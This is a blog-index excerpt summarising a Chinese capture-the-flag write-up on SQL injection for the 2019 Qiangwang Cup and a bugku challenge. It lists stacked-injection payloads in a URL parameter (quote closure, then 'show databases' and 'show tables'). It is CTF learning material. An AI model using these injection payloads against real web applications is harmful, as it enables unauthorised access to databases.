2023年10月5日
2019强网杯随便注&bugktu sql注入
摘要: 一.2019强网杯随便注入 过滤了一些函数,联合查询,报错,布尔,时间等都不能用了,尝试堆叠注入 1.通过判断是单引号闭合 ?inject=1'-- + 2.尝试堆叠查询数据库 ?inject=1';show databases;-- + 3.查询数据表 ?inject=1';show tables 阅读全文
posted @ 2023-10-05 17:39 mushangqiujin 阅读(13) 评论(0) 推荐(0)